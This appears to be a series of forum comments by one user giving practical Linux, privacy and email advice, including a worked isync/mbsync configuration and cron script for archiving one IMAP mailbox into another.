The Arch wiki may have some ideas for you - tl;dr is that GDM uses a global dconf
db over in /etc/
and this might be the root of your problem (these configs might not get cleaned up with a --purge
?) I’m a LightDM user so best I can do to help: https://wiki.archlinux.org/title/GDM#dconf_configuration
To try and bake down the complex answers, if you are basically familiar with PGP or SSH keys the concept of a Passkey is sort of in the same ballpark. But instead of using the same SSH keypair more than once, Passkeys create a new keypair for every use (website) and possibly every device (e.g. 2 phones using 1 website may create 2 sets of keypars, one on each device) - and additionally embeds the username (making it “one-click login”):
ssh-keygen ...
)The client private key is stored hopefully in a secure part of the phone/laptop (“enclave” or TPM hardware module) which locks it to that device; using a portable password manager instead such as Bitwarden is attractive since the private keys are stored in BW’s data (so can be synced across devices, backed up, etc.)
They use the phrase “replay” a lot to mean that sending the same password to a website is vulnerable to it being intercepted and used n+1 times (hacker); in the keypair model this doesn’t happen because each “challenge” is a unique crypto math puzzle generated dynamically every use, like TOTP/2FA but “better” because there’s no simple hash seed (TOTP/2FA use a constant seed saved by the client but it’s not as robust crypto).
There’s a MV3 alternate (same dev!) “uBlock Origin Lite” which this article completely misses out on mentioning: https://chromewebstore.google.com/detail/ublock-origin-lite/ddkjiahejlhfcafbddmgiahcphecmpfh
There are certain websites and tools which need chrome/chromium making it a necessary evil; for example there’s a new trend in firmware flashing of devices like ESP32 boards and HAM/GMRS radios which are web based and use Chrome tech. This new MV3 fork isn’t as good as the original but it’s better than nothing and does stop some ad trash.
The other data shows that posts and comments are going up linearly (a little suspicious but OK), but I wonder how the modlog affects the data (meaning how is it captured and when). I made one comment to a honest post yesterday (hosted on a remote instance), which then the post was deleted by admins like so:
Removed Post Any app for call recording ? reason: Rule 2: Please use !askandroid@lemdro.id for support questions.
So my comment shows in my history but cannot actually be accessed; was this comment counted? was that post counted? Was I counted as an active user yesterday if that was the only activity I did all day? Was the one person who upvoted my comment before the thread was deleted counted?
Lies, damn lies and statistics. :)
tl;dr - depends not only on the device but also carrier and region. Google specifically made changes to stop devs from doing it. Full explanation to read: https://www.pcmag.com/how-to/record-calls-on-your-android-phone
As a sort of historical side comment regarding your concern about misinformation - “how much does it cost to register one?” has been the litmus test to use for a long time (I’m of an age). More specific to .info
, it was one of the very first “new” TLDs introduced in 2002/2003 and the owners basically gave away millions of domains for free to gain market share.[1]
This led to a lot of scammers, hackers, malware and whatnot infecting the entire .info
TLD and it was in trouble by having the entire thing blocked even around 2012, almost 10 years after introduction.[2] It was troubled with new “crackdowns” (enforcement rules) as well due to it’s overwhelming use for nefarious purposes.[3]
Ad-hoc data from my own employment experience, in 2024 it’s still 100% blocked (like ref[2]) by corporate firewalls who leverage strict rules along with many others who had the same troubled history (.xyz
to name one) and the whole list of “free” domains. However, .info
now generally costs $20 USD/yr (with many places offering first year discount for less than $5 USD) so I think it’s trying to turn itself around.
Point being, “unrestricted” TLDs which are super cheap have had the historical tendency to attract scammers, phishers, malware and other nefarious entities because the cost of doing business at scale (these guys register hundreds of domains to churn through for short periods of time - “keep moving, don’t get caught” i.e.). Having lived through this whole saga, I open all TLDs I know to be cheap/free in private/incognito tabs and treat them with suspicion at first.
Most of them (besides weechat-android and quasseldroid which use bouncers/relays) seem to have fallen out of maintenance; Goguma appears to be currently maintained and updated as a pure standalone client and would be what I’d recommend trying first.
I have successfully sent back a PS5 controller (the original from the box) within the 1-yr warranty; they sent me a brand new controller. You comment “every quarter”, those controllers should be under warranty. Here is the US based link to get started: https://repairs.playstation.com/s/request-repair?id=2&locale=en-us&language=en_US
At the quantity the OP might use, buying by the gallon might make more sense - having a look to Amazon, the popular concentrations in gallon+ sizes are 70% and 99.9% (about the same price, $25 USD/gal) - it probably makes more logistical sense to go with 70% here to reduce evaporation and increase usable liquid on these tall, thin objects (so let’s say “sloppy use” of oddly shaped hard to handle glass).
I’ll leave my update at 70% concentration as the more economical choice - I’d presume based on their comment a soak in ZAP ($18 USD/gal) first is needed, then followed by the iso method… so it’s a little expensive no matter what for something they might not care about that much.
There are ways to clean glass passively, it sounds like your residue is organic.
Hope this helps. (edit: acetate -> acetone, oops) (edit2: 90% -> 70% alcohol per comment)
This is unfortunately a choice the Nautilus (GNOME) folks have taken; in other file managers (Thunar for XFCE, Caja for MATE, etc.) the ability to use custom actions are a first class citizen. Within Nautilus, the nautilus-actions
project was superseded by the filemanager-actions
project which was then archived: https://gitlab.gnome.org/Archive/filemanager-actions - a custom GNOME action might be something like gio open /path/to/terminal.desktop %d
(where %d is the directory from Nautilus)
There are 3rd party attempts to recreate what was stripped out of/abandoned in Nautilus such as this one: https://github.com/bassmanitram/actions-for-nautilus
Went down the rabbit hole for you while drinking some tea listening to the rain - it looks like in the future there is a new app/proposal for FreeDesktop to use xdg-terminal-exec
as the new/default way and it’s hard coded into the GNOME “gio” code over here (ctrl+f search xdg-terminal-exec): https://gitlab.gnome.org/GNOME/glib/-/blob/main/gio/gdesktopappinfo.c
That said, it looks like the nautilus-open-terminal Nautilus extension is shipped as part of gnome-terminal
so it’s hard coded to run that terminal not using the above code. Instead, you’d need to leverage a different extension called nautilus-open-any-terminal
for now until the landscape changes: https://github.com/Stunkymonkey/nautilus-open-any-terminal
(disclaimer: not using GNOME/Nautilus or Fedora, theorycraft from me)
In addition to the other comments which more directly address your question, DNS has been / can be used to exfiltrate data from “secure” networks. Search “dns data exfiltration” in your favourite search engine and you’ll get several high quality articles. Typical mitigations might be to limit which DNS servers your network can contact, restrict packet sizes to the bare minimum which valid use would have and so forth.
I’m familiar with the news about the brick - in the past I’ve had this problem (I think it was a bricked… pixel 2?) and faced similar power off issues. Keep trying what you’re trying but in various ways - I vaguely recall that I had to press volume up first and then hold power or something like that (meaning pressing them both at once or power first didn’t work). One of the various combos you’re trying is supposed to be the one that forces it off after ~30secs of holding but a fuzzy memory reminds me it was real finicky to actually get working. Worst case scenario, just let the battery die. :(
To your multiple IMAP concept, I have been using isync / mbsync (name change, package isync
in Debian) for years running via cron script to pull email from one domain at one provider and push it to a subfolder of another domain at another provider. You have to be aware of one specific gotcha but it’s otherwise been working all by itself forever without issues. Take note of the PipeLineDepth 1
for IMAP service providers which throttle your speed, I have to use it on the destination side provider config.
Two tips having worked in the corporate world (strict controls):
Create a basic non-spam web page for it that has something that doesn’t look like SEO garbage or whatever. Nothing more than “hey this is a personal domain of the flatbield family” is fine, maybe a link to something (links enhance rep - put a picture of your dog up or link to a wikipedia article or something) and let it rest for at least 30 days. The 3rd party filtering services used by corporate players severely limit, block or distrust a domain newer than 30 days (or longer, depending). Set up a SSL cert on it for another +1 to it’s rep value, HTTPS is looked at by these services and ensure the CA record is in your DNS for that SSL issuer.
Ensure you use the Providers’ setup for DKIM, SPF and so forth (many like Fastmail have a DNS-check wizard to get you all set up) as many modern providers will instantly downvote you if anything is missing or wrong with these controls (I’ve heard GMail and O365 particularly). In 2024 these are a must-have, not a nice-to-have, for getting your email received by anyone and everyone.
If you chose a domain at a TLD which has/had been used by the bad buys (dot-xyz, info, zip, etc.) you may wish to reconsider - there are TLDs which are wholescale blocked or downvoted in rep based on this (by the same services used above). Ensure someone working at a bank (strict egress controls for their employees) can visit your domain as a good litmus test as to it’s validity for use in email reputation.
A company such as Fastmail spends a lot of time ensuring their IP address space for sending and receiving mail is clean - getting spammers off their service, getting IP rep cleaned off blacklists and so forth. So your task is to focus on the same thing for your domain - if someone had previously owned the name they could have gotten it on blacklists long ago, a handy way to check old history is looking it up at web.archive.org for captured snapshots (and I’ve walked away from domain names because of this once I discovered previous content I didn’t like).
Fastmail has one feature many others lack (which is hard to research unless you want/need it and have go down the rabbit hole) - scope limited login tokens for specific uses. Specifically, you can set up one for “read only IMAP” (to archive emails using scripts etc.), “SMTP only” (to send emails from scripts like backup reports etc.) and so forth. Many, if not most, other providers either don’t have it, or if they do it’s very limited like one token only with no scope control. $0.02 hth
This is appears to be dark pattern marketing at play; they run a Mastodon instance which intercepts all links to the federated content and pushes you towards their for-profit site; it was actually not doing this earlier, when I visited a few links I actually got real mastodon content pages inconsistently.
Generally, if you visit anything like https://flipboard.social/@AlaskaBeacon@flipboard.com it redirects you to to flipboard.com/@AlaskaBeacon which is entirely their for-profit presence. But then it doesn’t a few tries later after testing more - I watched within a minute the Texas BBQ one allow me to see the profile on flipboard.social, I reloaded and was suddenly redirected to their flipboard.com/TexasBBQ site.
It seems you might be able to load them into your own mastodon instance manually and it will work (I do see a profile page with legacy posts which hadn’t federated yet, so “no posts” at this early of a test). Something like https://myserver.social/@AlaskaBeacon@flipboard.com will presumably work; I suspect though that all posts will be stubs that drive you towards flipboard.com to read the actual content, rather than a direct source (time will tell).
edit: s/is/appears to be/ to give benefit of the doubt
If you have access to some sort of basic Linux system (cloud server, local server whatever works for you) you can run a program on a timer such as https://isync.sourceforge.io/ (Debian package:
isync
) which reads email from one source and clones it to another. Be careful and run it in a security context that meets your needs (I use a local laptop w/encryption at home that runs headless 24/7, think raspberry Pi mode).This includes IMAP (1) -> IMAP (2) as well as IMAP -> Local and so on; as with any app you’ll need to spend a bit learning how to build the optimum config file for your needs, but once you get it going it’s truly a “set and forget” little widget. Use an on-fail service like https://healthchecks.io in your wrapper script to get notified on error, then go about your life.
Edit: @mike_wooskey@lemmy.thewooskeys.com glanced at your comments and see you have a lot of self-hosting chops, here’s a markdown doc of mine to use isync to clone one IMAP provider (domain1.com) to another IMAP provider (domain2.com) subfolder for archiving. (using a subfolder allows you to go both ways and use both domains normally)
----
Sync email via IMAP from host1/domain1 to a subfolder on host2/domain2 via a cron/timer. Can be reversed as well, just update
Patterns
to exclude the subfolders from being cross-replicated (looped).isync
package:apt-get update && apt-get install isync
Passwords for IMAP must be left on disk in plain text
${HOME}/.secure
contents on encrypted volume unlocked manuallyThe
mbsync
program keeps it’s transient index files in${HOME}/.mbsync/
with one per IMAP folder; these are used to keep track of what it’s already synced. Should something break it may be necessary to delete one of these files to force a resync.By design,
mbsync
will not delete a destination folder if it’s not empty first; this means if you delete a folder and all emails on the source in one step, a sync will break with an error/warning. Instead, delete all emails in the folder first, sync those deletions, then delete the empty folder on the source and sync again. See: https://sourceforge.net/p/isync/mailman/isync-devel/thread/f278216b-f1db-32be-fef2-ccaeea912524%40ojkastl.de/#msg37237271Simple crontab to run the script:
Main config for the
mbsync
program:${HOME}/.mbsyncrc
# Source IMAPAccount imap-src-account Host imap.host1.com Port 993 User user1 PassCmd "cat /home/USER/.secure/psrc" SSLType IMAPS SystemCertificates yes PipeLineDepth 1 #CertificateFile /etc/ssl/certs/ca-certificates.crt # Dest IMAPAccount imap-dest-account Host imap.host2.com Port 993 User user2 PassCmd "cat /home/USER/.secure/pdst" SSLType IMAPS SystemCertificates yes PipeLineDepth 1 #CertificateFile /etc/ssl/certs/ca-certificates.crt # Source map IMAPStore imap-src Account imap-src-account # Dest map IMAPStore imap-dest Account imap-dest-account # Transfer options Channel hasync Far :imap-src: Near :imap-dest:HASync/ Sync Pull Create Near Remove Near Expunge Near Patterns * CopyArrivalDate yes
This script leverages healthchecks.io to alert on failure; replace XXXXX with the UUID of your monitor URL.
${HOME}/bin/hasync.sh
#!/bin/bash # vars LOGDIR="${HOME}/log" TIMESTAMP=$(date +%Y-%m-%d_%H%M) LOGFILE="${LOGDIR}/mbsync_${TIMESTAMP}.log" HCPING="https://hc-ping.com/XXXXXXXXXXXXXXXXXXXXXXXXX" # preflight if [[ ! -d "${LOGDIR}" ]]; then mkdir -p "${LOGDIR}" fi # sync echo -e "\nBEGIN $(date +%Y-%m-%d_%H%M)\n" >> "${LOGFILE}" /usr/bin/mbsync -c ${HOME}/.mbsyncrc -V hasync 1>>"${LOGFILE}" 2>&1 EC=$? echo -e "\nEC: ${EC}" >> "${LOGFILE}" echo -e "\nEND $(date +%Y-%m-%d_%H%M)\n" >> "${LOGFILE}" # report if [[ $EC -eq 0 ]]; then curl -fsS -m 10 --retry 5 -o /dev/null "${HCPING}" find "${LOGDIR}" -type f -mtime +30 -delete fi exit $EC